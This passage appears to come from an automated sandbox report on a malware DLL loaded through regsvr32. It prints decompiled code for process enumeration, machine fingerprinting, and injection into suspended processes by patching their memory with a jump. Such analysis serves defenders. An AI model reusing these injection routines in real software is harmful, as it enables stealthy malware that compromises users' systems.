				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x219faa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}
























        0x1000cb83
        0x1000cb85
        0x1000cb87
        0x1000cb90
        0x1000cb9b
        0x1000cba0
        0x1000cba4
        0x1000cbb8
        0x1000cbc0
        0x1000cbd0
        0x1000cbd1
        0x1000cbd6
        0x1000cbe1
        0x1000cbe7
        0x1000cbef
        0x1000cbfd
        0x1000cc03
        0x1000cc04
        0x1000cc10
        0x1000cc17
        0x1000cc27
        0x1000cc67
        0x1000cc67
        0x1000cc46
        0x1000cc46
        0x1000cc65
        0x00000000
        0x00000000
        0x1000cc65
        0x1000cc27
        0x1000cbe1
        0x1000cba4
        0x1000cc69
        0x1000cc70
        0x1000cc73
        0x1000cc79
        0x1000cc79
        0x1000cc80
        0x1000cc87
        0x1000cc8a
        0x1000cc8f
        0x1000cc9c
        0x1000cca2
        0x1000cca9

        APIs
          • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
          • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
        • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
          • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
          • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
          • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
          • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
          • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
        • memset.MSVCRT ref: 1000CBB8
        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
        • String ID:
        • API String ID: 317994034-0
        • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
        • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
        • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
        • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000ABA3, Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 248 1000aba3-1000abc7 CreateToolhelp32Snapshot 249 1000ac38-1000ac3e 248->249 250 1000abc9-1000abf2 memset Process32First 248->250 251 1000ac02-1000ac13 call 1000ccc0 250->251 252 1000abf4-1000ac00 250->252 256 1000ac15-1000ac26 Process32Next 251->256 257 1000ac28-1000ac35 CloseHandle 251->257 252->249 256->251 256->257 257->249
        C-Code - Quality: 100%
        			E1000ABA3(intOrPtr __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				signed int _t14;
				signed int _t15;
				void* _t22;
				intOrPtr _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t40;
				void* _t42;

				_t33 = __ecx;
				_t31 = __edx; // executed
				_t14 = CreateToolhelp32Snapshot(2, 0);
				_t42 = _t14;
				_t15 = _t14 | 0xffffffff;
				if(_t42 != _t15) {
					memset( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t42,  &_v304) != 0) {
						while(1) {
							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
							_t40 = _t22;
							if(_t40 == 0) {
								break;
							}
							_t33 =  *0x1001e684; // 0x219faa0
							if(Process32Next(_t42,  &_v308) != 0) {
								continue;
							}
							break;
						}
						CloseHandle(_t42);
						_t15 = 0 | _t40 == 0x00000000;
					} else {
						_t28 =  *0x1001e684; // 0x219faa0
						 *((intOrPtr*)(_t28 + 0x30))(_t42);
						_t15 = 0xfffffffe;
					}
				}
				return _t15;
			}













        0x1000aba3
        0x1000abbb
        0x1000abbd
        0x1000abc0
        0x1000abc2
        0x1000abc7
        0x1000abd6
        0x1000abde
        0x1000abf2
        0x1000ac02
        0x1000ac08
        0x1000ac0d
        0x1000ac13
        0x00000000
        0x00000000
        0x1000ac15
        0x1000ac26
        0x00000000
        0x00000000
        0x00000000
        0x1000ac26
        0x1000ac2e
        0x1000ac35
        0x1000abf4
        0x1000abf4
        0x1000abfa
        0x1000abff
        0x1000abff
        0x1000abf2
        0x1000ac3e

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
        • memset.MSVCRT ref: 1000ABD6
        • Process32First.KERNEL32(00000000,?), ref: 1000ABED
        • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
        • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
        • String ID:
        • API String ID: 1267121359-0
        • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
        • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
        • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
        • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 94%
        			E1000B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E100095E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E100085D5( &_v16);
				_t33 = E1000C392(_t43);
				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E1000C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
			}















        0x1000b7a8
        0x1000b7b1
        0x1000b7bd
        0x1000b7c3
        0x1000b7c5
        0x1000b7cd
        0x1000b7e0
        0x1000b7ef
        0x1000b7fa
        0x1000b807
        0x1000b821
        0x1000b826
        0x1000b828
        0x1000b82f
        0x1000b83f
        0x1000b850
        0x1000b85a
        0x1000b862
        0x1000b869
        0x1000b86c
        0x1000b889

        APIs
        • memset.MSVCRT ref: 1000B7C5
        • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
        • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
          • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
        • lstrcatW.KERNEL32 ref: 1000B85A
        • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 3410906232-0
        • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
        • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
        • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
        • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 275 10028d00-10028d18 276 10028d36 275->276 277 10028d1a-10028d34 275->277 278 10028d3c-10028d4d 276->278 277->278 279 10028d6b-10028d72 278->279 280 10028d4f-10028d69 278->280 281 10028d78-10028d9f 279->281 280->281 282 10028da1-10028db4 281->282 283 10028db6-10028dc6 281->283 284 10028dcc-10028df3 GetSystemDirectoryW 282->284 283->284 285 10028e02-10028e38 VirtualProtectEx 284->285 286 10028df5-10028dfd 284->286 287 10028e54-10028e85 285->287 288 10028e3a-10028e4e 285->288 286->285 289 10028ea0-10028ec3 287->289 290 10028e87-10028e9b 287->290 288->287 291 10028ec5-10028eda 289->291 292 10028edd-10028ef4 289->292 290->289 291->292 293 10028f00-10028f0b 292->293 294 10028f34-10028f57 GetSystemDirectoryW 293->294 295 10028f0d-10028f2a 293->295 297 10028f75-10028fc0 294->297 298 10028f59-10028f6f 294->298 295->294 296 10028f2c-10028f32 295->296 296->293 296->294 300 10028fc5-10028fc9 297->300 298->297 301 10028fcb-10028fe5 300->301 302 10028fef 300->302 303 10028ff2-10029003 301->303 304 10028fe7-10028fed 301->304 302->303 305 10029005-10029015 303->305 306 10029018-1002902c 303->306 304->300 304->302 305->306 307 10029030-10029039 306->307 308 1002903b-10029057 307->308 309 10029059-1002908b 307->309 308->307 308->309 310 10029090-1002909b 309->310 311 100290cb-100290d4 310->311 312 1002909d-100290c1 310->312 312->311 313 100290c3-100290c9 312->313 313->310 313->311
        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 00000004.00000002.516656148.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000CA25, Relevance: 4.6, APIs: 3, Instructions: 120threadCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 314 1000ca25-1000ca45 call 1000c8fd 317 1000cb73-1000cb76 314->317 318 1000ca4b-1000ca6c call 1000a86d 314->318 321 1000ca72-1000ca74 318->321 322 1000cb63-1000cb72 call 1000861a 318->322 323 1000cb51-1000cb61 call 1000861a 321->323 324 1000ca7a 321->324 322->317 323->322 327 1000ca7d-1000ca7f 324->327 330 1000cb42-1000cb4b 327->330 331 1000ca85-1000ca9b call 1000ae66 327->331 330->321 330->323 334 1000cb00-1000cb04 331->334 335 1000ca9d-1000cab0 call 1000cb77 331->335 336 1000cb06-1000cb08 334->336 337 1000cb2f-1000cb3c 334->337 335->334 342 1000cab2-1000caca 335->342 339 1000cb19-1000cb29 336->339 340 1000cb0a-1000cb10 336->340 337->327 337->330 339->337 340->339 342->334 345 1000cacc-1000cae7 GetLastError ResumeThread 342->345 346 1000cae9-1000caf4 345->346 347 1000cafc-1000cafd CloseHandle 345->347 349 1000caf6 346->349 350 1000caf7 346->350 347->334 349->350 350->347
        C-Code - Quality: 89%
        			E1000CA25(intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t57;
				long _t61;
				intOrPtr _t62;
				signed int _t65;
				signed int _t68;
				signed int _t82;
				void* _t85;
				char _t86;

				_v8 = _v8 & 0x00000000;
				_v20 = __edx;
				_t65 = 0;
				_t37 = E1000C8FD( &_v8);
				_t86 = _t37;
				_v24 = _t86;
				_t87 = _t86;
				if(_t86 == 0) {
					return _t37;
				}
				_t38 =  *0x1001e688; // 0x2120590
				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
				_t82 = _v8;
				_t68 = 0;
				_v16 = 0;
				if(_t82 == 0) {
					L20:
					E1000861A( &_v24, 0);
					return _t65;
				}
				while(_t65 == 0) {
					while(_t65 == 0) {
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
						_t92 = _t45;
						if(_t45 >= 0) {
							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
							if(_t54 != 0) {
								_t57 =  *0x1001e684; // 0x219faa0
								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
								if(_t85 != 0) {
									GetLastError();
									_t61 = ResumeThread(_v36);
									_t62 =  *0x1001e684; // 0x219faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x219faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x219faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x219faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x219faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}



























        0x1000ca2b
        0x1000ca34
        0x1000ca37
        0x1000ca39
        0x1000ca3e
        0x1000ca40
        0x1000ca43
        0x1000ca45
        0x1000cb76
        0x1000cb76
        0x1000ca4b
        0x1000ca5d
        0x1000ca62
        0x1000ca65
        0x1000ca67
        0x1000ca6c
        0x1000cb63
        0x1000cb69
        0x00000000
        0x1000cb72
        0x1000ca72
        0x1000ca7d
        0x1000ca8a
        0x1000ca8e
        0x1000ca8f
        0x1000ca90
        0x1000ca94
        0x1000ca99
        0x1000ca9b
        0x1000caa8
        0x1000cab0
        0x1000cabb
        0x1000cac6
        0x1000caca
        0x1000cacc
        0x1000cada
        0x1000cae2
        0x1000cae7
        0x1000cae9
        0x1000caee
        0x1000caf4
        0x1000caf6
        0x1000caf6
        0x1000caf7
        0x1000caf7
        0x1000cafd
        0x1000cafd
        0x1000caca
        0x1000cab0
        0x1000cb04
        0x1000cb08
        0x1000cb0a
        0x1000cb13
        0x1000cb13
        0x1000cb19
        0x1000cb21
        0x1000cb24
        0x1000cb2c
        0x1000cb2c
        0x1000cb32
        0x1000cb35
        0x1000cb36
        0x1000cb3c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x1000cb3c
        0x1000cb42
        0x1000cb45
        0x1000cb46
        0x1000cb4b
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x1000cb51
        0x00000000
        0x00000000
        0x00000000
        0x1000cb51
        0x1000cb51
        0x1000cb54
        0x1000cb5a
        0x1000cb5e

        APIs
          • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
          • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
          • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
          • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
          • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
          • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
          • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
        • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
        • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
        • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
        • String ID:
        • API String ID: 1274669455-0
        • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
        • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
        • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
        • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 351 1000b998-1000b9b8 GetTokenInformation 352 1000b9ba-1000b9c3 GetLastError 351->352 353 1000b9fe 351->353 352->353 355 1000b9c5-1000b9d5 call 10008604 352->355 354 1000ba00-1000ba04 353->354 358 1000b9d7-1000b9d9 355->358 359 1000b9db-1000b9ee GetTokenInformation 355->359 358->354 359->353 360 1000b9f0-1000b9fc call 1000861a 359->360 360->358
        C-Code - Quality: 86%
        			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










        0x1000b99b
        0x1000b99c
        0x1000b9a3
        0x1000b9ab
        0x1000b9af
        0x1000b9b8
        0x1000b9fe
        0x1000b9fe
        0x1000b9c5
        0x1000b9cd
        0x1000b9cf
        0x1000b9d5
        0x1000b9ee
        0x00000000
        0x1000b9f0
        0x1000b9f5
        0x00000000
        0x1000b9fb
        0x1000b9d7
        0x1000b9d7
        0x1000b9d7
        0x1000b9d7
        0x1000b9d5
        0x1000ba04

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
        • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: InformationToken$AllocErrorHeapLast
        • String ID:
        • API String ID: 4258577378-0
        • Opcode ID: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
        • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
        • Opcode Fuzzy Hash: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
        • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 363 1000ae66-1000aeb3 memset CreateProcessW
        C-Code - Quality: 47%
        			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}








        0x1000ae6f
        0x1000ae75
        0x1000ae79
        0x1000ae7a
        0x1000ae7b
        0x1000ae7c
        0x1000ae80
        0x1000ae85
        0x1000ae8d
        0x1000aea5
        0x1000aeab
        0x1000aeb3

        APIs
        • memset.MSVCRT ref: 1000AE85
        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CreateProcessmemset
        • String ID:
        • API String ID: 2296119082-0
        • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
        • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
        • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
        • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48sleepstringCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 364 1000ccc0-1000ccce 365 1000ccd0-1000ccd1 364->365 366 1000cd1f-1000cd32 Sleep 364->366 367 1000ccd3-1000ccdf 365->367 368 1000cce1-1000cce7 367->368 369 1000cd15-1000cd1c 367->369 370 1000ccea-1000ccff lstrcmpi 368->370 369->367 371 1000cd1e 369->371 372 1000cd10-1000cd13 370->372 373 1000cd01-1000cd0c 370->373 371->366 372->369 373->370 374 1000cd0e 373->374 374->369
        C-Code - Quality: 100%
        			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}










        0x1000ccc6
        0x1000ccc9
        0x1000ccce
        0x1000ccd1
        0x1000ccd3
        0x1000ccd3
        0x1000ccd3
        0x1000ccd6
        0x1000ccd8
        0x1000ccdf
        0x1000cce7
        0x1000ccea
        0x1000ccf4
        0x1000ccfa
        0x1000ccfa
        0x1000ccff
        0x00000000
        0x00000000
        0x1000cd04
        0x1000cd05
        0x1000cd0c
        0x00000000
        0x00000000
        0x1000cd0e
        0x00000000
        0x1000cd0c
        0x1000cd13
        0x1000cd13
        0x1000cd15
        0x1000cd15
        0x1000cd16
        0x1000cd19
        0x1000cd19
        0x1000cd1e
        0x1000cd26
        0x1000cd32

        APIs
        • lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
        • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
